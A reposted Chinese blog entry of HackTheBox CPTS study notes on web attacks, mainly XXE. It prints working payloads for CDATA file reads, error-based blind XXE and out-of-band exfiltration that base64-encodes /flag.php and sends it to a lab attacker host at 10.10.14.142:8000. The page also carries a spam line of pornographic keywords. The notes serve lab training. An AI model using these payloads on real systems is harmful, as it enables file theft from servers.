国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

  1. Toy模板網(wǎng)首頁
  2. >Toy博客

HackTheBox - 學(xué)院【CPTS】復(fù)習(xí)4 - Web Attacks

2年前作者:Sugobet分類:Toy博客閱讀(17)違法舉報(bào)

這篇具有很好參考價(jià)值的文章主要介紹了HackTheBox - 學(xué)院【CPTS】復(fù)習(xí)4 - Web Attacks。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

Web Attacks

本模塊涵蓋三種常見的 Web 漏洞,即 HTTP 動(dòng)詞篡改、IDOR 和 XXE,每個(gè)漏洞都可能對(duì)公司的系統(tǒng)產(chǎn)生重大影響。我們將介紹如何通過各種方法識(shí)別、利用和防止它們中的每一個(gè)。

HTTP HEAD/GET/POST/PUT/OPTIONS

IDOR尋找

一般能夠從前端js找到調(diào)用的js代碼

XXE - CDATA

對(duì)于非php的其他后端語言,我們想要嘗試直接讀取后端代碼可以嘗試使用CDATA,它會(huì)作為原始數(shù)據(jù)輸出而不是被處理

xxe.dtd:

<!ENTITY p "%begin;%file;%end;">

這里調(diào)用參數(shù)實(shí)體,將文件包含在CDATA內(nèi)輸出

<!DOCTYPE xxx [
	<!ENTITY % begin "<[CDATA[">
	<!ENTITY % file SYSTEM "file:///index.php">
	<!ENTITY % end "]]>">
	<!ENTITY % xxe SYSTEM "http://IP:PORT/xxe.dtd">
	%xxe;
]>

<xxx>&p;</xxx>

這里需要使用參數(shù)實(shí)體,當(dāng)參數(shù)實(shí)體在我們托管的dtd文件中引用時(shí),參數(shù)實(shí)體將會(huì)被視為外部實(shí)體,這樣就可以繞過限制,從而讓外部實(shí)體與內(nèi)部實(shí)體的CDATA連接

基于error的半盲XXE

上面的xxe都是因?yàn)橛心硞€(gè)特定的參數(shù)會(huì)作為結(jié)果輸出,但在沒有輸出的情況下,上面的方法是不可行的,我們可以嘗試blind

當(dāng)嘗試使用未定義的tag或者實(shí)體的時(shí)候可能會(huì)引發(fā)error,如果后端未正確處理異常導(dǎo)致異常拋出,那么我們將能看到異常輸出并嘗試?yán)?/p>

xxe.dtd:

<!ENTITY % file SYSTEM "file:///flag.php">
<!ENTITY % xxe "<!ENTITY content SYSTEM '%file;'>">

<!DOCTYPE email [ 
  <!ENTITY % dtd SYSTEM "http://10.10.14.142:8000/xxe.dtd">
  %dtd;
  %xxe;
]>

這里通過參數(shù)實(shí)體來引入dtd當(dāng)%xxe;被執(zhí)行后,%xxe;會(huì)創(chuàng)建一個(gè)新的一般實(shí)體,而這個(gè)一般實(shí)體又引用了%file;(這里也可以使用不存在的實(shí)體進(jìn)行引發(fā)錯(cuò)誤,至少有一個(gè)錯(cuò)誤); %file;讀取的文件中作為&content;這個(gè)一般實(shí)體的值,由于這個(gè)值會(huì)被解析,只要文件中存在一些特殊字符,一旦被xml解釋器解析后將可能引發(fā)錯(cuò)誤,這就是為什么我們這個(gè)例子也會(huì)引發(fā)錯(cuò)誤的原因

如果讀取的文件中沒有什么東西會(huì)引發(fā)錯(cuò)誤,那么我們就需要手動(dòng)引發(fā)錯(cuò)誤:調(diào)用不存在的實(shí)體

<!ENTITY % xxe "<!ENTITY content SYSTEM '%ENTITY;%file;'>">

帶外全盲XXE

全盲只是沒有任何輸出包括error。其實(shí)從半盲我們可以看得出,我們通過dtd的參數(shù)實(shí)體來訪問文件

<!ENTITY % xxe "<!ENTITY content SYSTEM '%file;'>">

我們可以通過http協(xié)議發(fā)起遠(yuǎn)程文件訪問,同時(shí)將我們想要訪問的目標(biāo)文件通過http請(qǐng)求攜帶過來

xxe.dtd:

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag.php">
<!ENTITY % xxe "<!ENTITY content SYSTEM 'http://10.10.14.142:8000/?file=%file;'>">

跟半盲的基于錯(cuò)誤的xxe差不多,不過這次%xxe;參數(shù)實(shí)體創(chuàng)建一個(gè)一般實(shí)體,當(dāng)我們調(diào)用這個(gè)實(shí)體的時(shí)候?qū)?huì)攜帶我們讀取的文件內(nèi)容,發(fā)送http請(qǐng)求到我們的攻擊者服務(wù)器

<!DOCTYPE email [ 
  <!ENTITY % dtd SYSTEM "http://10.10.14.142:8000/xxe.dtd">
  %dtd;
  %xxe;
]>
<email>&content;</email>

這次我們需要手動(dòng)調(diào)用這個(gè)外部實(shí)體

HackTheBox - 學(xué)院【CPTS】復(fù)習(xí)4 - Web Attacks文章來源地址http://www.zghlxwxcb.cn/news/detail-511827.html

到了這里,關(guān)于HackTheBox - 學(xué)院【CPTS】復(fù)習(xí)4 - Web Attacks的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • Web實(shí)戰(zhàn)丨基于django+html+css+js的學(xué)院門戶網(wǎng)站

    Web實(shí)戰(zhàn)丨基于django+html+css+js的學(xué)院門戶網(wǎng)站

    本期內(nèi)容:基于Django+Html+Css+JavaScript的學(xué)院門戶網(wǎng)站 項(xiàng)目需求: python django 項(xiàng)目下載地址:https://download.csdn.net/download/m0_68111267/88726654 Web系統(tǒng)與技術(shù)課程旨在培養(yǎng)學(xué)生對(duì)Web系統(tǒng)的設(shè)計(jì)、開發(fā)和管理能力。課程內(nèi)容包括Web系統(tǒng)的基本概念、體系結(jié)構(gòu)和工作原理,以及常用的Web開

    2024年02月02日
    瀏覽(103)

  • CptS260: Introduction to Computer Architecture Assignment 7Processing

    Java Python CptS260: Introduction to Computer Architecture School of Electrical and Computer Engineering Assignment 7: Pipelined MIPS Execution on Pipelined a CPU (5%) Assignment Description In class we have gone over examples of how a pipelined MIPS CPU will execute instrucitons. We will assume there is not a delay slot for a branch instruciton. For this as

    2024年04月16日
    瀏覽(18)
  • ES6 模塊編程(新思路方便復(fù)習(xí)筆記)

    ES6 模塊編程(新思路方便復(fù)習(xí)筆記)

    1、ES6 使用 (1)export {名稱/對(duì)象/函數(shù)/變量/常量} (2) export 定義 = (3) export default {}導(dǎo)出模塊 2、使用 import {} from “xx.js” / import 名稱 form “xx.js” 導(dǎo)入模塊 2 應(yīng)用實(shí)例-批量導(dǎo)出形式 編寫 common.js , 該文件有函數(shù),變量, 常量, 對(duì)象 要求在 use_common.js , 可以使用到 common.js 中定義的 函

    2024年02月15日
    瀏覽(24)
  • 藍(lán)橋杯單片機(jī)模塊代碼綜合(考前快速復(fù)習(xí))

    藍(lán)橋杯單片機(jī)模塊代碼綜合(考前快速復(fù)習(xí))

    今天做的是藍(lán)橋杯所有模塊的綜合,只展示模塊的核心代碼,所以只能作為復(fù)習(xí)資料,而不是學(xué)習(xí)資料。這次給原理圖全在官方給的資料里,考試記不起來可以在文件夾里找到! (一)LED ? 核心代碼示例: 原理圖:? ?回憶一下,譯碼器選擇Y4使得其為低電平,J13中WR與地連

    2024年02月03日
    瀏覽(24)
  • Web知識(shí)點(diǎn)復(fù)習(xí)

    Web知識(shí)點(diǎn)復(fù)習(xí)

    1. get/post請(qǐng)求優(yōu)缺點(diǎn) (1)post更安全(不會(huì)作為url的一部分,不會(huì)被緩存、保存在服務(wù)器日志、以及瀏覽器瀏覽記錄中) (2)post發(fā)送的數(shù)據(jù)更大(get有url長(zhǎng)度限制) (3)post能發(fā)送更多的數(shù)據(jù)類型(get只能發(fā)送ASCII字符) (4)post比get慢,get和post請(qǐng)求的過程中GET產(chǎn)生一個(gè)T

    2024年01月22日
    瀏覽(25)
  • Web期末復(fù)習(xí)知識(shí)點(diǎn)

    Web期末復(fù)習(xí)知識(shí)點(diǎn)

    下載Tomcat :前往Apache Tomcat官方網(wǎng)站(https://tomcat.apache.org)下載適合您操作系統(tǒng)的Tomcat版本。? 安裝Tomcat :解壓下載的Tomcat壓縮文件到您選擇的目錄。例如,將Tomcat解壓到/opt/tomcat。 配置環(huán)境變量(可選) :如果需要在任何位置啟動(dòng)Tomcat,可以將Tomcat的bin目錄添加到系統(tǒng)的

    2024年02月04日
    瀏覽(27)
  • web期末復(fù)習(xí)-小程序框架

    web期末復(fù)習(xí)-小程序框架

    1.邏輯層是處理事務(wù)邏輯的層,是 MINA 事務(wù) 交互的 邏輯中心 2.視圖層和邏輯層是 雙線程通信 的,視圖層和邏輯層之間提供了數(shù)據(jù)傳輸和事件系統(tǒng) 3.視圖層和邏輯層通過系統(tǒng)層的 JSBridge 進(jìn)行通信 4.邏輯層把數(shù)據(jù)變化通知到 視圖 層,觸發(fā)視圖層的頁面更新 5.視圖層把出發(fā)的事

    2024年02月03日
    瀏覽(14)
  • 復(fù)習(xí)之web服務(wù)器--apache

    復(fù)習(xí)之web服務(wù)器--apache

    ? 兩臺(tái)虛擬機(jī) (nodea,nodeb) 配置ip 搭建軟件倉庫 關(guān)閉selinux Apache( 音譯為阿帕奇)是世界使用排名第一的Web服務(wù)器軟件。它可以運(yùn)行在幾乎所有廣泛使用的計(jì)算機(jī)平臺(tái)上,尤其對(duì)Linux的支持相當(dāng)完美。在服務(wù)器上可以支持HTTP協(xié)議。 超文本傳輸協(xié)議(Hypertext Transfer Protocol,HTTP) 是

    2024年02月11日
    瀏覽(30)
  • 微信小程序如何性能測(cè)試? —— 華為云性能測(cè)試服務(wù)(CPTS)壓測(cè)到服務(wù)后端,并完成性能評(píng)估

    微信小程序如何性能測(cè)試? —— 華為云性能測(cè)試服務(wù)(CPTS)壓測(cè)到服務(wù)后端,并完成性能評(píng)估

    微信小程序作為手機(jī)頁面的一種,相比傳統(tǒng)的網(wǎng)站和應(yīng)用來說存在比較特殊的地方: 1、? 開發(fā)者往往對(duì)程序做了限制,只能通過微信客戶端訪問 2、? 通過微信的Oauth進(jìn)行認(rèn)證 這樣往往會(huì)導(dǎo)致我們的性能測(cè)試工具無法壓測(cè)到應(yīng)用的后臺(tái)服務(wù),這里就跟大家分享下如何通過華為

    2024年02月11日
    瀏覽(25)
  • 【山東大學(xué)】web數(shù)據(jù)管理——復(fù)習(xí)筆記

    【山東大學(xué)】web數(shù)據(jù)管理——復(fù)習(xí)筆記

    寫在前面 若有圖片加載失敗,請(qǐng) 科學(xué)上網(wǎng) 。 本文為對(duì)軟件學(xué)院連老師的PPT課件總結(jié)所得的復(fù)習(xí)筆記,僅供參考。不保證對(duì)考點(diǎn)的全覆蓋,以PPT為主。 對(duì)往年考過的題相關(guān)知識(shí)點(diǎn)前面都標(biāo)注了“考過”,并高亮,供參考。 寫的比較匆忙,有遺漏、錯(cuò)誤之處敬請(qǐng)指正。 筆記中

    2024年02月08日
    瀏覽(59)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包